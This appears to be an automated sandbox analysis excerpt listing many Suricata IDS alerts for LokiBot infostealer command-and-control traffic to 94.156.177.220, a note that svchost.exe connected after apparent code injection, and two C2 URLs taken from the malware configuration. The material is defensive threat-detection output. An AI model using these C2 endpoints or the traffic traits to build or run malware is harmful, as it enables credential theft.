Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50036 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50036 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.5:50047
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50044 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50054 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50029 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50045 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50005 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50032 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50055 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.5:50030
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50055 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50061 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50028 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50061 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50058 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50028 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50061 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50055 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50028 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.5:50036
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50058 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49998 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50050 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49998 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49714 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50046 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50063 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50046 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50063 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50005 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50055 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50055 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.5:50063
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50028 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49992 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49992 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50044 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.5:50051
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50029 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50050 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50032 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50031 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.5:49998
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50037 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50037 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50031 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49953 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50058 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49992 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49714 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49976 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.5:50045
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.5:49953
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50064 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.5:50028
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50064 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50073 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50064 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50015 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50015 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50064 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50050 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50064 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50032 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50031 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50050 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49976 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50050 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50032 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50032 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.5:50050
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.5:50032
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.5:50005
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49992 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50015 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.5:50044
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49992 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49714 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.5:50046
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49714 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50031 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.5:50043
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49976 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50037 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50031 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.5:50029
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50015 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50015 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50054 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49976 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50039 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.5:50064
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50037 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50071 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50071 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50052 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50071 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49976 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50039 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.5:49992
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.5:50015
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50053 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50061 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50071 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50071 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50039 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50061 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50070 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50070 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.5:50031
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50070 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.5:50061
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50054 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50070 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.5:50058
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50070 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50073 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50073 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50052 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50052 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50033 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50033 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50073 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50073 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.5:49976
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50053 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50066 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50053 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50037 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.5:50070
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50039 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50033 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50039 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50052 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50066 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50052 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.5:50073
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50054 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.5:50071
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50053 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50066 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50033 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50033 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.5:49714
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.5:50039
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50066 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50066 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49970 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50053 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50042 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50065 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50065 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50065 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.5:50053
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.5:50052
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50059 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50059 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50059 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50065 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50065 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50067 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50067 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50067 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50059 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.5:50065
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49982 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49982 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49982 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50035 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50035 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50035 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50042 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.5:50066
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.5:50037
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49982 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49982 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50035 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50067 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50054 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50067 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50042 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.5:49982
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50042 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50042 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.5:50067
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.5:50042

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\svchost.exe

Network Connect: 94.156.177.220 80

Jump to behavior

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://kbfvzoboss.bid/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.trade/alien/fre.php
